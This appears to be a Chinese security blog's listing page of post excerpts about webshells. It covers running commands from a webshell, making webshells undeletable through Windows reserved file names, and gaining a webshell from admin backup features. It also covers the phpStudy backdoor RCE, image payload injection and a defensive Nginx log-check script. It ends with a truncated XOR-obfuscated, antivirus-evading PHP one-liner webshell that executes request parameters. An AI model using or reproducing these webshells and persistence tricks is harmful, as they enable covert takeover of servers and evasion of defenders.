一些挺经典的也都集成进去了,搞安全的就研究黑名单吧 搞渗透的就研究里面的小技巧吧 有些bypass safe mode 有些管理数据库挺方便 69webshell 转于FST
webshell下执行CMD的小技巧
- 2011-11-14
- 周边
- 2252 阅读
在webshell下执行CMD,按照常规, path:c:\\windows\\temp\\cmd.exe 查用户 Command: /c net user 这个情况是system32目录的net.exe 你能调用到。 要是调用不到,只能传文件到执行目录。 假设更cmd在同一个目录,c:\\windows\\temp\\net.exe 那就是 c:\\windows\temp\net.exe user 或者 c:\windows\temp\net.exe "user" 等等。 可是有些服务...
打造永不被删除的webshell
- 2011-05-21
- 周边
- 2290 阅读
Windows 下不能够以下面这些字样来命名文件/文件夹,包括:“aux”,“com1”“com2”“prn”“con”和“nul”等,但是通过cmd下是可以创建此类文件夹的,使用copy命令即可实现: D:\wwwroot>copy rootkit.asp \\.\D:\\wwwroot\aux.asp 已复制 1 个文件。 D:\AspWebServer\www...
一个知道帐户名密码在Webshell下执行命令的脚本
- 2010-06-21
- Vulndb
- 1999 阅读
作者:xi4oyu 新站开张,放出来吧。以前是应包总之约写的。前后也没给 过几个人,算是个伪私有版。 #!/usr/bin/env python #For God sake, Keep it priv4t3 import sys,os,time,pty def usage(): print "ptyexec.py: fuck the...
从后台到webshell的思路
- 2010-06-20
- 日志
- 1804 阅读
1.asp+acc/mssql程序 主要是利用后台对access数据库的"备份数据库"或"恢复数据库"功能,"备份的数据库路径"等变量没有过滤导致可以把任意文件后缀改为asp,从而得到webshell,msssql版的程序就直接应用了access版的代码,导致sql版照样可以利用。具体方法和分析可以...
Nginx日志检查,Nginx日志安全性分析脚本
- 2019-12-16
- 安全工具
- 4021 阅读
nginx_log_check Nginx日志安全分析脚本,日常运维中Log日志和waf分析是最常见的操作,平时都是用命令筛选log,但今天你可以试试这个小脚本来帮助你简化操作。 功能 统计Top 20 地址SQL注入分析扫描器告警分析漏洞利用检测敏感路径访问文件包含攻击Webshell寻找响应长度的url Top 20寻找罕见的脚本文件访问寻找302跳转的脚本文件 ...
intitle:"freedom is real – 1945"
- 2019-11-19 shdb
- 3598 阅读
Dork: intitle:"freedom is real - 1945" Category: Vulnerable servers Author: Jakob Denlinger Info: Common webshell that sets the HTML title tag to '.[ freedom is real - 1945 ].'
phpStudy后门RCE,复现/批量脚本/修复
- 2019-09-24
- Vulndb
- 6443 阅读
phpStudy后门介绍 phpStudy是国内一款免费的PHP环境集成包,集成Apache、PHP、MySQL、phpMyAdmin、ZendOptimizer等多款软件,无需配置即可直接安装使用,有着近百万PHP用户。近日被爆出phpStudy存在RCE后门,并通过验证复现。 软件作者声明:phpstudy 2016版PHP5.4存在后门。实际测试官网下载phpstudy2018版php-5.2.17和php-5.4.45也...
pixload:图片Payload创建注入工具
- 2019-09-20
- 安全工具
- 5439 阅读
pixload 用于创建/将Payload注入图片的工具集。其用途与安全防范场景例如:绕过CSP防护,用图片隐藏恶意攻击代码,在图片中编码webshell,利用图片进行XSS等等。 pixload安装 需要以下Perl模块: GDImage::ExifToolString::CRC32 git clone https://github.com/chinarulezzz/pixload ...
v33异或免杀PHP一句话
venom 33的更新,webshell免杀PHP一句话,体积更小了。 <?php class VMTX{ function __destruct(){ $BRLI='f$vjcT'^"\x7\x57\x5\xf\x11\x20"; return @$BRLI("$this->EKDL"); } } $vmtx=new VMTX(); @$vmtx->EKDL=isset($_GET['id'])?base64_decode($_POST['mr6']):$_POS...
